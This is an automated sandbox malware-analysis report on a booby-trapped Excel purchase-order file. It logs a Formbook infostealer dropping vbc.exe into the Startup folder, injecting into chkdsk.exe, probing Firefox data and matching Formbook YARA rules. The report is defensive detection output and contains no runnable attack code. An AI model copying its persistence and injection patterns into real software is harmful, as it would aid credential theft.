Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095D13F 8_2_0095D13F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00971238 8_2_00971238
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CF3CF 8_2_008CF3CF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D7353 8_2_008D7353
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008E1489 8_2_008E1489
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00905485 8_2_00905485
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0090D47D 8_2_0090D47D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009735DA 8_2_009735DA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D351F 8_2_008D351F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095579A 8_2_0095579A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009057C3 8_2_009057C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0096771D 8_2_0096771D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0094F8C4 8_2_0094F8C4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0096F8EE 8_2_0096F8EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00955955 8_2_00955955
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095394B 8_2_0095394B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00983A83 8_2_00983A83
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095DBDA 8_2_0095DBDA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CFBD7 8_2_008CFBD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008F7B00 8_2_008F7B00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0096FDDD 8_2_0096FDDD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095BF14 8_2_0095BF14
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008FDF7C 8_2_008FDF7C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00289882 8_2_00289882
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00281069 8_2_00281069
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00281072 8_2_00281072
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00288152 8_2_00288152
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0028DA0C 8_2_0028DA0C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0028AA52 8_2_0028AA52
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00285B22 8_2_00285B22
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00285B1F 8_2_00285B1F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00282CE9 8_2_00282CE9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00282CF2 8_2_00282CF2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00F22050 8_2_00F22050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025F1238 9_2_025F1238
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254E2E9 9_2_0254E2E9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02557353 9_2_02557353
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0259A37B 9_2_0259A37B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02552305 9_2_02552305
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025763DB 9_2_025763DB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254F3CF 9_2_0254F3CF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025F63BF 9_2_025F63BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0256905A 9_2_0256905A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02553040 9_2_02553040
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0257D005 9_2_0257D005
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254E0C6 9_2_0254E0C6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0259A634 9_2_0259A634
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025F2622 9_2_025F2622
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255E6C1 9_2_0255E6C1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02554680 9_2_02554680
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025857C3 9_2_025857C3
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025D579A 9_2_025D579A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255C7BC 9_2_0255C7BC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0258D47D 9_2_0258D47D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02585485 9_2_02585485
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02561489 9_2_02561489
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02596540 9_2_02596540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255351F 9_2_0255351F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0256C5F0 9_2_0256C5F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02603A83 9_2_02603A83
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02577B00 9_2_02577B00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254FBD7 9_2_0254FBD7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025DDBDA 9_2_025DDBDA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025FCBA4 9_2_025FCBA4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255C85C 9_2_0255C85C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0257286D 9_2_0257286D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025EF8EE 9_2_025EF8EE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025D5955 9_2_025D5955
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025669FE 9_2_025669FE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025F098E 9_2_025F098E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025529B2 9_2_025529B2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0256EE4C 9_2_0256EE4C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02582E2F 9_2_02582E2F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0257DF7C 9_2_0257DF7C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02560F3F 9_2_02560F3F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255CD5B 9_2_0255CD5B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02580D3B 9_2_02580D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025EFDDD 9_2_025EFDDD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00082D87 9_2_00082D87
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00089E30 9_2_00089E30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00082FB0 9_2_00082FB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA9882 9_2_00EA9882
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA1069 9_2_00EA1069
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA1072 9_2_00EA1072
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA8152 9_2_00EA8152
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EAAA52 9_2_00EAAA52
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EADA0C 9_2_00EADA0C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA5B22 9_2_00EA5B22
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA5B1F 9_2_00EA5B1F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA2CE9 9_2_00EA2CE9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA2CF2 9_2_00EA2CF2
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: PO11272020.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 025BF970 appears 81 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0259373B appears 238 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 02593F92 appears 110 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0254E2A8 appears 38 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0254DF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0084DF5C appears 137 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008BF970 appears 84 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00893F92 appears 132 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0089373B appears 253 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0084E2A8 appears 60 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 008CE2A8 appears 60 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 0093F970 appears 84 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 00913F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 0091373B appears 253 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 008CDF5C appears 137 times
PE file contains strange resources
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\chkdsk.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: winsqlite3.dll Jump to behavior
Yara signature match
Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.adwa.spyw.expl.evad.winXLSX@14/11@5/3
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00092720 CoInitialize,CoCreateInstance,OleUninitialize, 9_2_00092720
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PO11272020.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR1332.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: PO11272020.xlsx Virustotal: Detection: 35%
Source: PO11272020.xlsx ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
